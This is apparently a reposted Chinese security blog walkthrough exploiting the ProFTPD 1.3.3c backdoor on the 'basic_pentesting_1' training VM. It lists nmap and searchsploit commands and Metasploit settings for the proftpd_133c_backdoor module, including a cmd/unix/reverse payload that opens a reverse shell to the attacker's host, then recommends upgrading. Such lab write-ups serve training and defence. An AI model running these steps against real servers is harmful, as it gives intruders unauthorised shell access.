前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >FTP服务后门实战

FTP服务后门实战

作者头像
Al1ex
发布2024-01-09 15:32:46
1530
发布2024-01-09 15:32:46
举报
文章被收录于专栏:网络安全攻防网络安全攻防
影响范围

ProFTPD 1.3.3c

漏洞介绍

ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限

漏洞利用

这里以"basic_pentesting_1"靶机中的ProFTPD 1.3.3c版本为例进行漏洞的检测与利用,首先执行以下命令来获取目标主机的IP地址信息

代码语言:javascript
复制
nmap -sn 192.168.204.0/24

服务端口扫描:

代码语言:javascript
复制
nmap -A -T4 -v 192.168.204.144

从上面的扫描结果可以看到目标服务器开启了21、22、80端口,而且注意到目标服务器中的FTP服务版本为ProFTPD 1.3.3c,所以我们可以直接利用该服务对应的漏洞对目标服务器实施攻击操作,首先我们使用searchsploit进行漏洞的检索操作

代码语言:javascript
复制
searchsploit ProFTOD 1.3.3c

随后我们直接在MSF中检索漏洞利用模块

代码语言:javascript
复制
msfconsole
search ProFTOD 1.3.3c
代码语言:javascript
复制
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.204.144
RHOSTS => 192.168.204.144
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.204.135
lhost => 192.168.204.135
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

随后执行载荷并成功获取到目标服务器的权限

修复建议

升级到FTPD的最新版本

参考连接

https://www.cnvd.org.cn/flaw/show/CNVD-2010-3023

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2024-01-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 影响范围
  • 漏洞介绍
  • 漏洞利用
  • 修复建议
  • 参考连接
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档